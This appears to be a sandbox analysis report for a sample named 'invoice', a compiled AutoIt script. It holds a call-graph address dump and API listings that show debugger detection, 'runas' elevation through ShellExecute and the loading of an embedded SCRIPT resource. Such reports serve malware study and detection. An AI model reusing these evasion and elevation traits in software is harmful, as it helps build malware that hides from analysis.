99351->99317 99353->98866 99354->98863 99356 f87bbf 99355->99356 99360 f87be5 _memmove 99355->99360 99357 fa0f36 Mailbox 59 API calls 99356->99357 99356->99360 99358 f87c34 99357->99358 99359 fa0f36 Mailbox 59 API calls 99358->99359 99359->99360 99360->97683 99361->97684 99362 fc0155 99364 f8ae4f Mailbox 99362->99364 99363 f8b6d1 99415 fe9ed4 89 API calls 4 library calls 99363->99415 99364->99363 99366 fc0bb5 99364->99366 99368 fc0bbe 99364->99368 99372 10021aa 99364->99372 99410 fe87be 99364->99410 99414 f89df0 59 API calls Mailbox 99364->99414 99416 fd63f2 99366->99416 99373 f877c7 59 API calls 99372->99373 99374 10021c1 99373->99374 99375 f89997 84 API calls 99374->99375 99376 10021d0 99375->99376 99377 f87b76 59 API calls 99376->99377 99378 10021e3 99377->99378 99379 f89997 84 API calls 99378->99379 99380 10021f0 99379->99380 99381 100220a 99380->99381 99382 100227e 99380->99382 99438 f89c9c 59 API calls 99381->99438 99384 f89997 84 API calls 99382->99384 99386 1002283 99384->99386 99385 100220f 99387 100226d 99385->99387 99390 1002226 99385->99390 99388 1002291 99386->99388 99392 10022af 99386->99392 99439 f89bf8 59 API calls Mailbox 99387->99439 99440 f89bf8 59 API calls Mailbox 99388->99440 99396 f879ab 59 API calls 99390->99396 99395 10022c4 99392->99395 99441 f89c9c 59 API calls 99392->99441 99394 10022d9 99398 f880d7 59 API calls 99394->99398 99395->99394 99442 f89c9c 59 API calls 99395->99442 99399 1002233 99396->99399 99400 10022f3 99398->99400 99401 f87c8e 59 API calls 99399->99401 99419 fdf713 99400->99419 99403 1002241 99401->99403 99404 f879ab 59 API calls 99403->99404 99405 100225a 99404->99405 99406 f87c8e 59 API calls 99405->99406 99408 1002268 99406->99408 99407 100227a Mailbox 99407->99364 99443 f89b9c 59 API calls Mailbox 99408->99443 99411 fe87c7 99410->99411 99412 fe87cc 99410->99412 99444 fe785c 99411->99444 99412->99364 99414->99364 99415->99366 99467 fd6334 99416->99467 99418 fd6400 99418->99368 99420 f877c7 59 API calls 99419->99420 99421 fdf726 99420->99421 99422 f87b76 59 API calls 99421->99422 99423 fdf73a 99422->99423 99424 fdf479 61 API calls 99423->99424 99431 fdf75c 99423->99431 99425 fdf756 99424->99425 99427 f879ab 59 API calls 99425->99427 99425->99431 99426 fdf479 61 API calls 99426->99431 99427->99431 99428 fdf7d6 99430 f879ab 59 API calls 99428->99430 99429 f879ab 59 API calls 99429->99431 99432 fdf7ef 99430->99432 99431->99426 99431->99428 99431->99429 99433 f87c8e 59 API calls 99431->99433 99434 f87c8e 59 API calls 99432->99434 99433->99431 99435 fdf7fb 99434->99435 99436 f880d7 59 API calls 99435->99436 99437 fdf80a Mailbox 99435->99437 99436->99437 99437->99408 99438->99385 99439->99407 99440->99407 99441->99395 99442->99394 99443->99407 99445 fe7873 99444->99445 99461 fe7993 99444->99461 99446 fe788b 99445->99446 99448 fe78b3 99445->99448 99449 fe78ca 99445->99449 99446->99448 99450 fe789b 99446->99450 99447 fa0f36 Mailbox 59 API calls 99455 fe78a9 Mailbox _memmove 99447->99455 99448->99447 99451 fa0f36 Mailbox 59 API calls 99449->99451 99463 fe78e7 99449->99463 99459 fa0f36 Mailbox 59 API calls 99450->99459 99451->99463 99452 fe7912 99456 fa0f36 Mailbox 59 API calls 99452->99456 99453 fe7920 99454 fa0f36 Mailbox 59 API calls 99453->99454 99457 fe7926 99454->99457 99458 fa0f36 Mailbox 59 API calls 99455->99458 99456->99455 99465 fe7514 59 API calls Mailbox 99457->99465 99458->99461 99459->99455 99461->99412 99462 fe7932 99466 f85b75 61 API calls Mailbox 99462->99466 99463->99452 99463->99453 99463->99455 99465->99462 99466->99455 99468 fd635c 99467->99468 99469 fd633f 99467->99469 99468->99418 99469->99468 99471 fd631f 59 API calls Mailbox 99469->99471 99471->99469 99472 f83633 99473 f8366a 99472->99473 99474 f83688 99473->99474 99475 f836e7 99473->99475 99513 f836e5 99473->99513 99476 f8375d PostQuitMessage 99474->99476 99477 f83695 99474->99477 99479 f836ed 99475->99479 99480 fbd24c 99475->99480 99484 f836d8 99476->99484 99481 fbd2bf 99477->99481 99482 f836a0 99477->99482 99478 f836ca DefWindowProcW 99478->99484 99485 f836f2 99479->99485 99486 f83715 SetTimer RegisterWindowMessageW 99479->99486 99522 f911d0 10 API calls Mailbox 99480->99522 99526 fe281f 71 API calls _memset 99481->99526 99487 f836a8 99482->99487 99488 f83767 99482->99488 99492 f836f9 KillTimer 99485->99492 99493 fbd1ef 99485->99493 99486->99484 99489 f8373e CreatePopupMenu 99486->99489 99495 f836b3 99487->99495 99496 fbd2a4 99487->99496 99520 f84531 64 API calls _memset 99488->99520 99489->99484 99491 fbd273 99523 f911f3 341 API calls Mailbox 99491->99523 99517 f844cb Shell_NotifyIconW _memset 99492->99517 99500 fbd228 MoveWindow 99493->99500 99501 fbd1f4 99493->99501 99503 f8374b 99495->99503 99504 f836be 99495->99504 99496->99478 99525 fd7f5e 59 API calls Mailbox 99496->99525 99497 fbd2d1 99497->99478 99497->99484 99500->99484 99506 fbd1f8 99501->99506 99507 fbd217 SetFocus 99501->99507 99502 f8370c 99518 f83114 DeleteObject DestroyWindow Mailbox 99502->99518 99519 f845df 81 API calls _memset 99503->99519 99504->99478 99524 f844cb Shell_NotifyIconW _memset 99504->99524 99505 f8375b 99505->99484 99506->99504 99508 fbd201 99506->99508 99507->99484 99521 f911d0 10 API calls Mailbox 99508->99521 99513->99478 99515 fbd298 99516 f843db 68 API calls 99515->99516 99516->99513 99517->99502 99518->99484 99519->99505 99520->99505 99521->99484 99522->99491 99523->99504 99524->99515 99525->99513 99526->99497 99527 f81055 99532 f82649 99527->99532 99530 fa2ec0 __cinit 67 API calls 99531 f81064 99530->99531 99533 f877c7 59 API calls 99532->99533 99534 f826b7 99533->99534 99539 f83582 99534->99539 99536 f82754 99538 f8105a 99536->99538 99542 f83416 59 API calls 2 library calls 99536->99542 99538->99530 99543 f835b0 99539->99543 99542->99536 99544 f835bd 99543->99544 99545 f835a1 99543->99545 99544->99545 99546 f835c4 RegOpenKeyExW 99544->99546 99545->99536 99546->99545 99547 f835de RegQueryValueExW 99546->99547 99548 f835ff 99547->99548 99549 f83614 RegCloseKey 99547->99549 99548->99549 99549->99545 99550 fbfe35 99551 fbfe3f 99550->99551 99586 f8ac90 Mailbox _memmove 99550->99586 99647 f88e34 59 API calls Mailbox 99551->99647 99555 fa0f36 59 API calls Mailbox 99576 f8a097 Mailbox 99555->99576 99557 f8b5d5 99563 f881a7 59 API calls 99557->99563 99560 f881a7 59 API calls 99560->99576 99561 f8b5da 99657 fe9ed4 89 API calls 4 library calls 99561->99657 99571 f8a1b7 99563->99571 99564 fc03ae 99651 fe9ed4 89 API calls 4 library calls 99564->99651 99566 f87f41 59 API calls 99566->99586 99568 f877c7 59 API calls 99568->99576 99569 fc03bd 99570 fd71e5 59 API calls 99570->99576 99572 fa2ec0 67 API calls __cinit 99572->99576 99574 fd63f2 Mailbox 59 API calls 99574->99571 99575 fc0d2f 99656 fe9ed4 89 API calls 4 library calls 99575->99656 99576->99555 99576->99557 99576->99560 99576->99561 99576->99564 99576->99568 99576->99570 99576->99571 99576->99572 99576->99575 99579 f8a6ba 99576->99579 99641 f8ca20 341 API calls 2 library calls 99576->99641 99642 f8ba60 60 API calls Mailbox 99576->99642 99578 ffbd80 341 API calls 99578->99586 99655 fe9ed4 89 API calls 4 library calls 99579->99655 99580 fd63f2 Mailbox 59 API calls 99580->99586 99581 f8b416 99646 f8f803 341 API calls 99581->99646 99582 f8a000 341 API calls 99582->99586 99584 fc0bc3 99653 f89df0 59 API calls Mailbox 99584->99653 99586->99566 99586->99571 99586->99576 99586->99578 99586->99580 99586->99581 99586->99582 99586->99584 99587 fc0bd1 99586->99587 99590 f8b37c 99586->99590 99591 fa0f36 59 API calls Mailbox 99586->99591 99594 f8ade2 Mailbox 99586->99594 99597 f8b685 99586->99597 99603 ffc3f4 99586->99603 99635 fe79ff 99586->99635 99648 fd71e5 59 API calls 99586->99648 99649 ffc2a7 85 API calls 2 library calls 99586->99649 99654 fe9ed4 89 API calls 4 library calls 99587->99654 99589 fc0bb5 99589->99571 99589->99574 99644 f89e9c 60 API calls Mailbox 99590->99644 99591->99586 99593 f8b38d 99645 f89e9c 60 API calls Mailbox 99593->99645 99594->99597 99600 f8ae4f Mailbox 99594->99600 99650 fd71e5 59 API calls 99594->99650 99652 fe9ed4 89 API calls 4 library calls 99597->99652 99600->99571 99600->99589 99600->99597 99601 fe87be 61 API calls 99600->99601 99602 10021aa 87 API calls 99600->99602 99643 f89df0 59 API calls Mailbox 99600->99643 99601->99600 99602->99600 99604 f877c7 59 API calls 99603->99604 99605 ffc408 99604->99605 99606 f877c7 59 API calls 99605->99606 99607 ffc410 99606->99607 99608 f877c7 59 API calls 99607->99608 99609 ffc418 99608->99609 99610 f89997 84 API calls 99609->99610 99634 ffc426 99610->99634 99611 f87d2c 59 API calls 99611->99634 99612 ffc60f 99613 ffc63c Mailbox 99612->99613 99660 f89b9c 59 API calls Mailbox 99612->99660 99613->99586 99615 ffc5f6 99616 f87e0b 59 API calls 99615->99616 99620 ffc603 99616->99620 99617 f87a84 59 API calls 99617->99634 99618 ffc611 99621 f87e0b 59 API calls 99618->99621 99619 f881a7 59 API calls 99619->99634 99623 f87c8e 59 API calls 99620->99623 99624 ffc620 99621->99624 99622 f87faf 59 API calls 99626 ffc4bd CharUpperBuffW 99622->99626 99623->99612 99627 f87c8e 59 API calls 99624->99627 99625 f87faf 59 API calls 99628 ffc57d CharUpperBuffW 99625->99628 99658 f8859a 68 API calls 99626->99658 99627->99612 99659 f8c707 69 API calls 2 library calls 99628->99659 99631 f89997 84 API calls 99631->99634 99632 f87e0b 59 API calls 99632->99634 99633 f87c8e 59 API calls 99633->99634 99634->99611 99634->99612 99634->99613 99634->99615 99634->99617 99634->99618 99634->99619 99634->99622 99634->99625 99634->99631 99634->99632 99634->99633 99636 fe7a0b 99635->99636 99637 fa0f36 Mailbox 59 API calls 99636->99637 99638 fe7a19 99637->99638 99639 fe7a27 99638->99639 99640 f877c7 59 API calls 99638->99640 99639->99586 99640->99639 99641->99576 99642->99576 99643->99600 99644->99593 99645->99581 99646->99597 99647->99586 99648->99586 99649->99586 99650->99594 99651->99569 99652->99589 99653->99589 99654->99589 99655->99571 99656->99561 99657->99571 99658->99634 99659->99634 99660->99613 99661 f81016 99666 f84ad2 99661->99666 99664 fa2ec0 __cinit 67 API calls 99665 f81025 99664->99665 99667 fa0f36 Mailbox 59 API calls 99666->99667 99668 f84ada 99667->99668 99669 f8101b 99668->99669 99673 f84a94 99668->99673 99669->99664 99674 f84a9d 99673->99674 99675 f84aaf 99673->99675 99676 fa2ec0 __cinit 67 API calls 99674->99676 99677 f84afe 99675->99677 99676->99675 99678 f877c7 59 API calls 99677->99678 99679 f84b16 GetVersionExW 99678->99679 99680 f87d2c 59 API calls 99679->99680 99681 f84b59 99680->99681 99682 f87e8c 59 API calls 99681->99682 99685 f84b86 99681->99685 99683 f84b7a 99682->99683 99684 f87886 59 API calls 99683->99684 99684->99685 99686 f84bf1 GetCurrentProcess IsWow64Process 99685->99686 99688 fbdbbd 99685->99688 99687 f84c0a 99686->99687 99689 f84c89 GetSystemInfo 99687->99689 99690 f84c20 99687->99690 99691 f84c56 99689->99691 99701 f84c95 99690->99701 99691->99669 99694 f84c7d GetSystemInfo 99696 f84c47 99694->99696 99695 f84c32 99697 f84c95 2 API calls 99695->99697 99696->99691 99699 f84c4d FreeLibrary 99696->99699 99698 f84c3a GetNativeSystemInfo 99697->99698 99698->99696 99699->99691 99702 f84c2e 99701->99702 99703 f84c9e LoadLibraryA 99701->99703 99702->99694 99702->99695 99703->99702 99704 f84caf GetProcAddress 99703->99704 99704->99702 99705 f8e70b 99708 f8d260 99705->99708 99707 f8e719 99709 f8d27d 99708->99709 99724 f8d4dd 99708->99724 99710 fc2a39 99709->99710 99711 fc29ea 99709->99711 99731 f8d2a4 99709->99731 99752 ffa4fb 341 API calls __cinit 99710->99752 99714 fc29ed 99711->99714 99722 fc2a08 99711->99722 99715 fc29f9 99714->99715 99714->99731 99750 ffab0f 341 API calls 99715->99750 99716 fa2ec0 __cinit 67 API calls 99716->99731 99719 f8d594 99744 f88bb2 68 API calls 99719->99744 99720 fc2c0e 99720->99720 99721 f8d6ab 99721->99707 99722->99724 99751 ffafb7 341 API calls 3 library calls 99722->99751 99724->99721 99757 fe9ed4 89 API calls 4 library calls 99724->99757 99727 f8d5a3 99727->99707 99728 fc2b55 99756 ffa866 89 API calls 99728->99756 99731->99716 99731->99719 99731->99721 99731->99724 99731->99728 99732 f88620 69 API calls 99731->99732 99739 f8a000 341 API calls 99731->99739 99740 f881a7 59 API calls 99731->99740 99742 f888a0 68 API calls __cinit 99731->99742 99743 f886a2 68 API calls 99731->99743 99745 f8859a 68 API calls 99731->99745 99746 f8d0dc 341 API calls 99731->99746 99747 f89f3a 59 API calls Mailbox 99731->99747 99748 f8d060 89 API calls 99731->99748 99749 f8cedd 341 API calls 99731->99749 99753 f88bb2 68 API calls 99731->99753 99754 f89e9c 60 API calls Mailbox 99731->99754 99755 fd6ae3 60 API calls 99731->99755 99732->99731 99739->99731 99740->99731 99742->99731 99743->99731 99744->99727 99745->99731 99746->99731 99747->99731 99748->99731 99749->99731 99750->99721 99751->99724 99752->99731 99753->99731 99754->99731 99755->99731 99756->99724 99757->99720 99758 fc44c8 99762 fd625a 99758->99762 99760 fc44d3 99761 fd625a 85 API calls 99760->99761 99761->99760 99768 fd6294 99762->99768 99770 fd6267 99762->99770 99763 fd6296 99774 f89488 84 API calls Mailbox 99763->99774 99764 fd629b 99766 f89997 84 API calls 99764->99766 99767 fd62a2 99766->99767 99769 f87c8e 59 API calls 99767->99769 99768->99760 99769->99768 99770->99763 99770->99764 99770->99768 99771 fd628e 99770->99771 99773 f89700 59 API calls _wcsstr 99771->99773 99773->99768 99774->99764 99775 f8e5ec 99778 f8ce1a 99775->99778 99777 f8e5f8 99779 f8ce86 99778->99779 99780 f8ce32 99778->99780 99781 f8ceaf 99779->99781 99788 fe9ed4 89 API calls 4 library calls 99779->99788 99780->99779 99782 f8a000 341 API calls 99780->99782 99781->99777 99785 f8ce69 99782->99785 99784 fc2915 99784->99784 99785->99781 99787 f89e9c 60 API calls Mailbox 99785->99787 99787->99779 99788->99784 99789 152d9a8 99790 152b5f8 GetPEB 99789->99790 99791 152da4f 99790->99791 99803 152d898 99791->99803 99804 152d8a1 Sleep 99803->99804 99805 152d8af 99804->99805 99806 fc0180 99818 f9fac4 99806->99818 99808 fc0196 99809 fc01ac 99808->99809 99810 fc0217 99808->99810 99827 f89fbd 60 API calls 99809->99827 99812 f8fe40 341 API calls 99810->99812 99817 fc020b Mailbox 99812->99817 99814 fc01eb 99814->99817 99828 fe83f8 59 API calls Mailbox 99814->99828 99816 fc0c10 Mailbox 99817->99816 99829 fe9ed4 89 API calls 4 library calls 99817->99829 99819 f9fad0 99818->99819 99820 f9fae2 99818->99820 99830 f89e9c 60 API calls Mailbox 99819->99830 99822 f9fae8 99820->99822 99823 f9fb11 99820->99823 99824 fa0f36 Mailbox 59 API calls 99822->99824 99831 f89e9c 60 API calls Mailbox 99823->99831 99826 f9fada 99824->99826 99826->99808 99827->99814 99828->99817 99829->99816 99830->99826 99831->99826 99832 f81066 99837 f8f8cf 99832->99837 99834 f8106c 99835 fa2ec0 __cinit 67 API calls 99834->99835 99836 f81076 99835->99836 99838 f8f8f0 99837->99838 99870 fa0083 99838->99870 99842 f8f937 99843 f877c7 59 API calls 99842->99843 99844 f8f941 99843->99844 99845 f877c7 59 API calls 99844->99845 99846 f8f94b 99845->99846 99847 f877c7 59 API calls 99846->99847 99848 f8f955 99847->99848 99849 f877c7 59 API calls 99848->99849 99850 f8f993 99849->99850 99851 f877c7 59 API calls 99850->99851 99852 f8fa5e 99851->99852 99880 f960e7 99852->99880 99856 f8fa90 99857 f877c7 59 API calls 99856->99857 99858 f8fa9a 99857->99858 99908 f9ff1e 99858->99908 99860 f8fae1 99861 f8faf1 GetStdHandle 99860->99861 99862 f8fb3d 99861->99862 99863 fc4904 99861->99863 99865 f8fb45 OleInitialize 99862->99865 99863->99862 99864 fc490d 99863->99864 99915 fe6be1 64 API calls Mailbox 99864->99915 99865->99834 99867 fc4914 99916 fe72b0 CreateThread 99867->99916 99869 fc4920 CloseHandle 99869->99865 99917 fa015c 99870->99917 99873 fa015c 59 API calls 99874 fa00c5 99873->99874 99875 f877c7 59 API calls 99874->99875 99876 fa00d1 99875->99876 99877 f87d2c 59 API calls 99876->99877 99878 f8f8f6 99877->99878 99879 fa02e2 6 API calls 99878->99879 99879->99842 99881 f877c7 59 API calls 99880->99881 99882 f960f7 99881->99882 99883 f877c7 59 API calls 99882->99883 99884 f960ff 99883->99884 99924 f95bfd 99884->99924 99887 f95bfd 59 API calls 99888 f9610f 99887->99888 99889 f877c7 59 API calls 99888->99889 99890 f9611a 99889->99890 99891 fa0f36 Mailbox 59 API calls 99890->99891 99892 f8fa68 99891->99892 99893 f96259 99892->99893 99894 f96267 99893->99894 99895 f877c7 59 API calls 99894->99895 99896 f96272 99895->99896 99897 f877c7 59 API calls 99896->99897 99898 f9627d 99897->99898 99899 f877c7 59 API calls 99898->99899 99900 f96288 99899->99900 99901 f877c7 59 API calls 99900->99901 99902 f96293 99901->99902 99903 f95bfd 59 API calls 99902->99903 99904 f9629e 99903->99904 99905 fa0f36 Mailbox 59 API calls 99904->99905 99906 f962a5 RegisterWindowMessageW 99905->99906 99906->99856 99909 f9ff2e 99908->99909 99910 fd5ac5 99908->99910 99911 fa0f36 Mailbox 59 API calls 99909->99911 99927 fe9b90 60 API calls 99910->99927 99914 f9ff36 99911->99914 99913 fd5ad0 99914->99860 99915->99867 99916->99869 99928 fe7296 65 API calls 99916->99928 99918 f877c7 59 API calls 99917->99918 99919 fa0167 99918->99919 99920 f877c7 59 API calls 99919->99920 99921 fa016f 99920->99921 99922 f877c7 59 API calls 99921->99922 99923 fa00bb 99922->99923 99923->99873 99925 f877c7 59 API calls 99924->99925 99926 f95c05 99925->99926 99926->99887 99927->99913

                        Executed Functions

                        Function 00F83B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F83B7A
                        • IsDebuggerPresent.KERNEL32 ref: 00F83B8C
                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,010452F8,010452E0,?,?), ref: 00F83BFD
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                          • Part of subcall function 00F90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F83C26,010452F8,?,?,?), ref: 00F90ACE
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F83C81
                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01037770,00000010), ref: 00FBD3EC
                        • SetCurrentDirectoryW.KERNEL32(?,010452F8,?,?,?), ref: 00FBD424
                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01034260,010452F8,?,?,?), ref: 00FBD4AA
                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FBD4B1
                          • Part of subcall function 00F83A58: GetSysColorBrush.USER32(0000000F), ref: 00F83A62
                          • Part of subcall function 00F83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00F83A71
                          • Part of subcall function 00F83A58: LoadIconW.USER32(00000063), ref: 00F83A88
                          • Part of subcall function 00F83A58: LoadIconW.USER32(000000A4), ref: 00F83A9A
                          • Part of subcall function 00F83A58: LoadIconW.USER32(000000A2), ref: 00F83AAC
                          • Part of subcall function 00F83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F83AD2
                          • Part of subcall function 00F83A58: RegisterClassExW.USER32(?), ref: 00F83B28
                          • Part of subcall function 00F839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F83A15
                          • Part of subcall function 00F839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83A36
                          • Part of subcall function 00F839E7: ShowWindow.USER32(00000000,?,?), ref: 00F83A4A
                          • Part of subcall function 00F839E7: ShowWindow.USER32(00000000,?,?), ref: 00F83A53
                          • Part of subcall function 00F843DB: _memset.LIBCMT ref: 00F84401
                          • Part of subcall function 00F843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F844A6
                        Strings
                        • runas, xrefs: 00FBD4A5
                        • This is a third-party compiled AutoIt script., xrefs: 00FBD3E4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                        • String ID: This is a third-party compiled AutoIt script.$runas
                        • API String ID: 529118366-3287110873
                        • Opcode ID: 3e1e786e39f17ae35bf11a5fccb1f53c19aa778b7f0ef670c32384b19233b318
                        • Instruction ID: 81ed613dff3c224aab7119fa2b56905679346ff5154f2ef9a9150275d8c8fdf3
                        • Opcode Fuzzy Hash: 3e1e786e39f17ae35bf11a5fccb1f53c19aa778b7f0ef670c32384b19233b318
                        • Instruction Fuzzy Hash: 2C5159B1E04249ABCF21FBB4DD82EFD7BB8AB06700F004069F491A6151DA7D5605FB21
                        Function 00F84AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                        Download Yara Rule
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 00F84B2B
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        • GetCurrentProcess.KERNEL32(?,0100FAEC,00000000,00000000,?), ref: 00F84BF8
                        • IsWow64Process.KERNEL32(00000000), ref: 00F84BFF
                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F84C45
                        • FreeLibrary.KERNEL32(00000000), ref: 00F84C50
                        • GetSystemInfo.KERNEL32(00000000), ref: 00F84C81
                        • GetSystemInfo.KERNEL32(00000000), ref: 00F84C8D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                        • String ID:
                        • API String ID: 1986165174-0
                        • Opcode ID: ed6f7fd6800b885d55c3a9871fba614fb62d1ff7ebbe0646f62aa62b8e08b6ca
                        • Instruction ID: ee5ed8844b1cbcb8b4642769a62c07c564065c13fec4cb7a51f20f9323c1c74d
                        • Opcode Fuzzy Hash: ed6f7fd6800b885d55c3a9871fba614fb62d1ff7ebbe0646f62aa62b8e08b6ca
                        • Instruction Fuzzy Hash: 9191D63194A7C1DEC731DB6884512EAFFE4AF66310B48499DD0CB93A41D224F948EB1A
                        Function 00F84FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F84EEE,?,?,00000000,00000000), ref: 00F84FF9
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F84EEE,?,?,00000000,00000000), ref: 00F85010
                        • LoadResource.KERNEL32(?,00000000,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F), ref: 00FBDC90
                        • SizeofResource.KERNEL32(?,00000000,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F), ref: 00FBDCA5
                        • LockResource.KERNEL32(00F84EEE,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F,00000000), ref: 00FBDCB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: 5e5a2ce5177be52464f5f21987ecead8a254e79db2ca29abb7ead819939b8064
                        • Instruction ID: 7a134520949df7fb4fc20147a8fdeb31a44ca5db27cc45061dc5a17f1a16fe79
                        • Opcode Fuzzy Hash: 5e5a2ce5177be52464f5f21987ecead8a254e79db2ca29abb7ead819939b8064
                        • Instruction Fuzzy Hash: A1115E75600702AFD7329B65DC48FA77BB9EBC9B51F20416CF44596250DB62E800A760
                        Function 00F8FE40 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID:
                        • API String ID: 3964851224-0
                        • Opcode ID: 24c4b8c9a9a7cc58cdfc3f60c15ab6504555b8f25af2cbb4f1d2fff5335f0af7
                        • Instruction ID: 98d530e4005a3f8d8e03bbe06a7cb4118cbbecacfe1ba44fbabe9e834835fd8a
                        • Opcode Fuzzy Hash: 24c4b8c9a9a7cc58cdfc3f60c15ab6504555b8f25af2cbb4f1d2fff5335f0af7
                        • Instruction Fuzzy Hash: 3192AC71A083418FEB24DF14C991B6AB7E1BF84314F14892DF88A8B351DB75EC45EB92
                        Function 00FE449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNELBASE(?,00FBE6F1), ref: 00FE44AB
                        • FindFirstFileW.KERNELBASE(?,?), ref: 00FE44BC
                        • FindClose.KERNEL32(00000000), ref: 00FE44CC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirst
                        • String ID:
                        • API String ID: 48322524-0
                        • Opcode ID: 9ada58c725e0ae16bd2afafe39050fd083b1ab25c228348603100e2290fb2d69
                        • Instruction ID: 966572ba95db62fb36c8f1c39bbd55983582339f338b967ce6a01f31602a8718
                        • Opcode Fuzzy Hash: 9ada58c725e0ae16bd2afafe39050fd083b1ab25c228348603100e2290fb2d69
